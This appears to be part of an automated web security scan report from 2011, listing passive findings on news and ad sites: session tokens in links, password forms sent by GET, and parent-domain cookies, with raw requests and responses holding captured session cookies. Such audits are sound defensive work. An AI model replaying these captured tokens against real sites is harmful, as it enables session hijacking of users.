Path:   /news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html HTTP/1.1
Host: www.indianasnewscenter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 09 May 2011 13:49:37 GMT
Vary: Accept-Encoding
X-Server-Name: dv-c1-r2-u24-b9
Content-Type: text/html;charset=utf-8
Date: Mon, 09 May 2011 13:59:02 GMT
Connection: close
Set-Cookie: click_mobile=0
Content-Length: 71453

               
                                                                               <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<title>

   
                                   At Noon: Casey A
...[SNIP]...
<body class="parentnews path-news-local article" id="entry-121488004">
<script id="aptureScript" type="text/javascript" src="http://www.apture.com/js/apture.js?siteToken=pgKiQTB" charset="utf-8"></script>
...[SNIP]...
7.6. http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.orlandosentinel.com
Path:   /business/os-cfb-cover-casey-tv-20110509,0,6839926.story

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /business/os-cfb-cover-casey-tv-20110509,0,6839926.story HTTP/1.1
Host: www.orlandosentinel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.orlandosentinel.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Content-Type: text/html; charset=UTF-8
X-Instance-Name: i7s30z1n1
Last-Modified: Mon, 09 May 2011 13:58:29 GMT
Vary: Accept-Encoding
Cache-Control: private, max-age=142
Date: Mon, 09 May 2011 13:59:15 GMT
Connection: close
Content-Length: 227706


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//E
...[SNIP]...
<li>

<a href="http://www.cars.com/go/crp/index.jsp;jsessionid=3K2EIDRGSYOU3LAYIEVE2VA?aff=osent" name="&lpos=Sub&lid=Research Cars" rel="nofollow" >Research Cars</a>
...[SNIP]...
7.7. http://www.orlandosentinel.com/business/transparent  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.orlandosentinel.com
Path:   /business/transparent

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /business/transparent HTTP/1.1
Host: www.orlandosentinel.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mainPage=/business

Response

HTTP/1.1 404 Not Found
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.orlandosentinel.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Content-Location: http://www.orlandosentinel.com/hive/error/notfound.jsp
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Cache-Control: private, max-age=180
Date: Mon, 09 May 2011 13:59:31 GMT
Connection: close
Content-Length: 130184


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
   <meta http-equiv="X-UA-Compatible" con
...[SNIP]...
<li>

<a href="http://www.cars.com/go/crp/index.jsp;jsessionid=3K2EIDRGSYOU3LAYIEVE2VA?aff=osent" name="&lpos=Sub&lid=Research Cars" rel="nofollow" >Research Cars</a>
...[SNIP]...
8. Password field submitted using GET method  previous  next
There are 2 instances of this issue:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

8.1. http://www.floridatoday.com/odygel/lib/userauth/content/login.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.floridatoday.com
Path:   /odygel/lib/userauth/content/login.html

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /odygel/lib/userauth/content/login.html HTTP/1.1
Host: www.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=D08734_70008|D08734_72078; GCIONSN=AAAAOn52dzoxfnVidDox; GCIONPN=AAAAOn5zZWdtZW50czpEMDg3MzRfNzAwMDh8RDA4NzM0XzcyMDc4; s_cc=true; s_sq=%5B%5BB%5D%5D; gban=inter%3Ddisabled%3Atrue%2Cviews%3A1%2Cexpiry%3A16H%2Cplacementid%3A1273145%2Cpreload%3Afalse%2Cid%3Ainter%2Ccontrolurl%3Ahttp%253A//gannett.gcion.com/addyn/3.0/5111.1/1273144/0/0/ADTECH%253Balias%253Dfl-brevard.flatoday.com/news/article.htm_Interstitial%253Bcookie%253Dinfo%253Bloc%253D100%253Btarget%253D_blank%253Bgrp%253D24711%253Bmisc%253D1304949586599%253Bsize%253D0%253Bnoperf%253D1%2Cexpires%3A1305007188

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 15 Nov 2010 22:45:32 GMT
Accept-Ranges: bytes
ETag: "08e11cf1685cb1:0"
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:37 GMT
Connection: close
Content-Length: 2828

   <div class="ody-login-box clearfix">
       <a><div id="ody-login-close" class="ody-close"></div></a>
       <div class="ody-title">Log In<span class="ody-orsignup" id="ody-login-signup" >or&nbsp;<a>Sign Up<
...[SNIP]...
</div>
       <form id="ody-login-form" onsubmit="return false">
       <div class="ody-fields">
...[SNIP]...
<div class="ody-f-i"><input type="password" id="Password" name="Password" onkeypress="GDN.HandleKeyPress(event, GDN.UA.Events.Login.Click, 13);" style="width: 200px" />
                   </div>
...[SNIP]...
8.2. http://www.floridatoday.com/odygel/lib/userauth/content/signup.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.floridatoday.com
Path:   /odygel/lib/userauth/content/signup.html

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password fields:

Request

GET /odygel/lib/userauth/content/signup.html HTTP/1.1
Host: www.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=D08734_70008|D08734_72078; GCIONSN=AAAAOn52dzoxfnVidDox; GCIONPN=AAAAOn5zZWdtZW50czpEMDg3MzRfNzAwMDh8RDA4NzM0XzcyMDc4; s_cc=true; s_sq=%5B%5BB%5D%5D; gban=inter%3Ddisabled%3Atrue%2Cviews%3A1%2Cexpiry%3A16H%2Cplacementid%3A1273145%2Cpreload%3Afalse%2Cid%3Ainter%2Ccontrolurl%3Ahttp%253A//gannett.gcion.com/addyn/3.0/5111.1/1273144/0/0/ADTECH%253Balias%253Dfl-brevard.flatoday.com/news/article.htm_Interstitial%253Bcookie%253Dinfo%253Bloc%253D100%253Btarget%253D_blank%253Bgrp%253D24711%253Bmisc%253D1304949586599%253Bsize%253D0%253Bnoperf%253D1%2Cexpires%3A1305007188

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Wed, 17 Nov 2010 21:52:00 GMT
Accept-Ranges: bytes
ETag: "0c064a9a186cb1:0"
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:37 GMT
Connection: close
Content-Length: 7620

   <div class="ody-pa-box ody-su-box clearfix">
       <a><div id="ody-signup-close" class="ody-close"></div></a>
       <div class="ody-title">Sign Up<span class="ody-orlogin" id="ody-signup-login">or <a>Log i
...[SNIP]...
</div>
           <form id="UAWidget-Registration" name="UAWidget-Registration" onsubmit="return false">
           <div id="ody-signup-main" class="ody-noerrors">
...[SNIP]...
<div class="ody-f-i"><input type="password" id="Password" name="Password" onkeypress="GDN.HandleKeyPress(event, GDN.UA.Events.Registration.RegistrationClick, 13);" size="30" /></div>
...[SNIP]...
<div class="ody-f-i"><input type="password" id="ConfirmPassword" name="ConfirmPassword" onkeypress="GDN.HandleKeyPress(event, GDN.UA.Events.Registration.RegistrationClick, 13);" size="30" /></div>
...[SNIP]...
9. Cookie scoped to parent domain  previous  next
There are 93 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

9.1. http://api.twitter.com/1/statuses/user_timeline.json  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline.json

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /1/statuses/user_timeline.json?screen_name=clash_music&callback=TWTR.Widget.receiveCallback_1&include_rts=true&count=3&clientsource=TWITTERINC_WIDGET&1304949966734=cachebust HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: api.twitter.com

Response

HTTP/1.0 400 Bad Request
Date: Mon, 09 May 2011 14:07:38 GMT
Server: hi
Status: 400 Bad Request
X-RateLimit-Limit: 150
X-RateLimit-Remaining: 0
X-Runtime: 0.00679
Content-Type: application/json; charset=utf-8
Content-Length: 306
X-RateLimit-Class: api
Cache-Control: no-cache, max-age=300
X-RateLimit-Reset: 1304953175
Set-Cookie: k=173.193.214.243.1304950057993657; path=/; expires=Mon, 16-May-11 14:07:37 GMT; domain=.twitter.com
Set-Cookie: guest_id=130495005799789295; path=/; expires=Wed, 08 Jun 2011 14:07:37 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCA6sFdUvAToHaWQiJTI1NzM4ZGNiNzM3ZmRj%250AMWYyNzZmY2FhM2E1MTViMmRiIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--46243618f4526801b6b817f75048101c30bc6cbc; domain=.twitter.com; path=/; HttpOnly
Expires: Mon, 09 May 2011 14:12:37 GMT
Connection: close

TWTR.Widget.receiveCallback_1({"request":"\/1\/statuses\/user_timeline.json?screen_name=clash_music&callback=TWTR.Widget.receiveCallback_1&include_rts=true&count=3&clientsource=TWITTERINC_WIDGET&13049
...[SNIP]...
9.2. http://t.mookie1.com/t/v1/imp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://t.mookie1.com
Path:   /t/v1/imp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /t/v1/imp?migAgencyId=234&migSource=atlas&migAtlAI=205850969&migRandom=143243442&migTagDesc=Cingular&migAtlSA=286738722&migAtlC=480d7815-42e6-4315-a737-64cdf14f8adc HTTP/1.1
Host: t.mookie1.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/286738722/direct;wi.468;hi.60/01?click=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253B411066b5f02ce7a6%253B12fd50ec8f3%2C0%253B%253B%253B2504330642%2C7DlEAJUeFQAKf3sAAAAAACSrHgAAAAAAAgAAAAQAAAAAAP8AAAACCtSXIQAAAAAAO1ciAAAAAABSbigAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACvfA0AAAAAAAIAAwAAAAAA88gO1S8BAAAAAAAAAGE0ODFmZWJjLTdhNDQtMTFlMC05MDA0LTczNGVhOWE2MDJiMQCvugEAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Esurphace%2Ecom%252Fads%252Frubicon%5Forlandosentinel%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13049496061384085-86537%26campID%3D60443%26crID%3D86537%26pubICode%3D2250555%26pub%3D321582%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fwww%2Esurphace%2Ecom%2Fads%2Frubicon%5Forlandosentinel%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; RMFL=011QD4ETU107OI|U107OK; RMFM=011QGuZMJ10CWN|U10CXL; NXCLICK2=011QGuZMNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_TE_ALL/1x1/11304348270.6228!y!B3!CXL!EVT; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:16 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: id=914804995789526; path=/; expires=Sat, 02-Jun-12 14:00:16 GMT; domain=.mookie1.com
Set-Cookie: session=1304949616|1304949616; path=/; domain=.mookie1.com
Content-Length: 35
Content-Type: image/gif

GIF87a.............,...........D..;
9.3. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.clashmusic.com
Path:   /news/sufjan-stevens-suffered-nervous-breakdown

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/sufjan-stevens-suffered-nervous-breakdown HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:30 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: SESS5079a7bd09304b581fb1d164353615c5=47u27u5frb149p678dd9853b46; expires=Wed, 01-Jun-2011 17:33:50 GMT; path=/; domain=.clashmusic.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:00:30 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
9.4. http://www.nme.com/news/sufjan-stevens/56527  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.nme.com
Path:   /news/sufjan-stevens/56527

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/sufjan-stevens/56527 HTTP/1.1
Host: www.nme.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
NmeAkamaiMatch: 1
IgniteAkamaiMatch: 1
X-Wf-Protocol-1: http://meta.wildfirehq.org/Protocol/JsonStream/0.2
X-Wf-1-Plugin-1: http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3
X-Wf-1-Structure-1: http://meta.firephp.org/Wildfire/Structure/FirePHP/FirebugConsole/0.1
X-Wf-1-1-1-1: 55|[{"Type":"LOG"},"now: Mon, 09 May 2011 15:00:36 +0100"]|
X-Wf-1-1-1-2: 63|[{"Type":"LOG"},"id: 56830e3f97674f92659a8a7e54b9b44fea17850e"]|
X-Wf-1-1-1-3: 23|[{"Type":"LOG"},"li: "]|
X-Wf-1-1-1-4: 24|[{"Type":"LOG"},"cs: 1"]|
X-Wf-1-1-1-5: 23|[{"Type":"LOG"},"rc: "]|
X-Wf-1-1-1-6: 24|[{"Type":"LOG"},"ic: 1"]|
X-Wf-1-1-1-7: 28|[{"Type":"LOG"},"ttl: 3560"]|
X-Wf-1-1-1-8: 29|[{"Type":"LOG"},"mu: 786432"]|
X-Wf-1-1-1-9: 41|[{"Type":"LOG"},"ts: 0.0014510154724121"]|
X-Wf-1-1-1-10: 25|[{"Type":"LOG"},"ct: us"]|
Content-Type: text/html
Vary: Accept-Encoding
Expires: Mon, 09 May 2011 14:00:37 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 14:00:37 GMT
Connection: close
Set-Cookie: ServerID=1043; path=/
Set-Cookie: PHPSESSID=nb14qm2u5j3cpt8fp8muap0hh1; path=/; domain=.nme.com
Set-Cookie: ignite_loggedin=false; expires=Wed, 08-Jun-2011 14:00:36 GMT; path=/; domain=.nme.com
Set-Cookie: browsertype=web; expires=Tue, 10-May-2011 14:00:37 GMT; path=/; domain=.nme.com
Content-Length: 62535

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/
...[SNIP]...
9.5. http://ad.afy11.net/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad?mode=7&publisher_dsp_id=2&external_user_id=2931142961646634775 HTTP/1.1
Host: ad.afy11.net
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a=dlTCn+fJdUa0LKLUTmKT9w; f=AgECAAAAAADQJJIL142rTdU9kgdm-bJN; c=AQEDAAAAAADd1IcE942rTQAAAAAAAAAAAAAAAAAAAADXjatNAQABAAVhFtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD-OLnU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHTSCgFcjqtNAAAAAAAAAAAAAAAAAAAAADuOq00BAAEABWEW1egAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP84udToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoOsmAWj9sk0AAAAAAAAAAAAAAAAAAAAAZv2yTQEAAQD5JiDV6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyyS71OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=; s=1,2*4dab79ba*48Tp2my9Nk*5pS60fYTxp8svLzyNVfDVhLzEw==*,5*4db5834c*2EEOB9ANdq*SF70FY7-Mq4FQiM_*

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache, must-revalidate
Server: AdifyServer
Content-Type: image/gif
Content-Length: 45
Set-Cookie: s=1,2*4dab79ba*UMOtU6T9f3*5oBTqxB3t3jlHiD_vqydkrPvYQ==*,5*4db5834c*2EEOB9ANdq*SF70FY7-Mq4FQiM_*; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net;
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"

GIF89a.............!.......,...........D..;if
9.6. http://ad.turn.com/server/pixel.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/pixel.htm?fpid=12 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=Dza9cImQIgAOYp1sdVBFKJ3j2mm-3nw5DLdjMDY9RiDfaqaDzVRu9ZiuBStYaftY-vQa-Lrt8AEh2sMWSofalPWfoLMBxH0g9IiAwEZtd5YPMEpw2Dimbl_Ar_3pbVlWCr9zpcNmhJ4YALFsRS0OjTgV6OPboE5AailwYD2p-IySdlkZutLQ7ZQ85RG7C4VB2qlA743KvZ39ywpdZbpMhh0Lmtiu91APHHd__cAh9gz07Cd5Zg6Jg2z-OuW7NiYiFK2x3qhPSvxxgQjvFMzvNsv0sG_uSycuZycGHG0i9JDVJjS_HVyCCR3CpH4C_z7OWENSx6qTFa7od7SUHN9Egei6BZRgi_D5YzTOICCuYCx9jiGo5Ucxoan5H4AQ_xV3iHql4u4O7_sSYdnd02k2DNQHkfpT4yC0sBHWKifDZRo8VXe-PeWk1nfFtbmH7GvZ1QMXO5GUno07zoygwBocRoTsxUcxWk5nbrSqN6k58j1TORmwcQ4tlm0RwihyF_UsCL2x9N8rCbkNMc9dtlOLKF16IBansyDt77nh-l623XjbgLPXgE5UhrKbb-yapi7Iz_t1m3RC9HNVGEroWY24Hx0ymz9iB_PZ274hwZ5aW0QB1cBEZ955Qck8jqa4MZ7v1aY1ttiEjhYPnmeJ7sqVaGWGUflWpKK8ZDluGXe-OMAMpHNeDinV6bUD4c7xTKPYqOV7QZ7aFBA3m0phFzvLGUyTINTvrbznNuEHAKkRnaoKqQQIp4dB6WERi9SKRUeAKB26GseFkfH7OU-Y9jArFwJN1aNKu26HMlC2vlBlEo3AibJolRtP9GKY2j0AIA4QF0ROUKwFAxzf5GHHC-l2sUbwMrieaxWXba1ERSK3tWWrKuMIkiwSl3Te1VhilaTSnNbIlFewbQ0HwOyAYWPKVOFzsrgdqMMSA-afxC3bSvIKc60386S8NF-JuqnS_gYeiHql4u4O7_sSYdnd02k2DGktwZFEgr-H1aRa-v8iL2Y8VXe-PeWk1nfFtbmH7GvZojS9aaLdC4dIDTz1p5oDzGZlZrZQz9gqPi_YpBWRR_zyJstfeR3BF0X80yINyf_bnscLz8pWZl03MCHITMyErF16IBansyDt77nh-l623XgQrvHzCa6-Ar3OKf1u5O9co8jF4KazkjYUhi9Y-2cpubMeTwvrsn6UDDgstfmlQPoNQYQoyiD68kJjw-yNw0ZU1aY1ttiEjhYPnmeJ7sqVaHrw4FE_cCyjpsbZ3unV7uMrdoKrhpnovF-eFvpriEhVrMfpGoruuBgzA1-jEhdCS2wFnaEJ_77D-SBSvq4apv0KqQQIp4dB6WERi9SKRUeApAoLbAXgH3MAg4fG-53hwYWvZ7p1zrzJVM0-BhBuMNYrc7Kk7dBes7lnotHfeZ9VkUKGgPT-wupZmNTexU6iznjzwSpHwNAhjAO4xxi375pcdR85v5iezdnNkxnuNwjFRvAyuJ5rFZdtrURFIre1ZZBSlbvBC0evnYqUUsRvAsWc1siUV7BtDQfA7IBhY8pUNZFdTBAhalBFYq3Dyxi9TBfNNCsQZvwCdk93ue_PwR2IeqXi7g7v-xJh2d3TaTYMVxQyOpakzryCsBb1QMcxxTxVd7495aTWd8W1uYfsa9lUSQm6Px99bWr2RVRxuk2yEM0JJ22tYCLP7uBw8UeaI1M5GbBxDi2WbRHCKHIX9Sz_QtJiSnym5S_qsqKzl484XXogFqezIO3vueH6XrbdeBrsNvqpBtQW35VrocWM1hJEMrVYqmvz7xJtELJ71uRTTECD0HA2vYVMATXXOR4kic7TP4ECMD5bQt22Ufb1ASjVpjW22ISOFg-eZ4nuypVoX3-sqUKgtXKTyeeAJ3WoNBTpFHNeMdsJNdx7bmFAC56JAHYn97lyiGJ5XDJCkUNkw_be5i-Fx9NF-BKeFGAMPAqpBAinh0HpYRGL1IpFR4AB4o7EViaAPEO7EwRwSKXjmcb3GKio9SBOsgaqPfeFsasCu54shXpdyVhXu91m5wiW91g1mAzej0c7wnGxz5vZRvAyuJ5rFZdtrURFIre1ZfDRnDTWzff-YlyXP_zUgfGc1siUV7BtDQfA7IBhY8pUeWxnJe61Raa9uTyiNiaLtdI3rxLW4kElZ2z2lu4o7hWIeqXi7g7v-xJ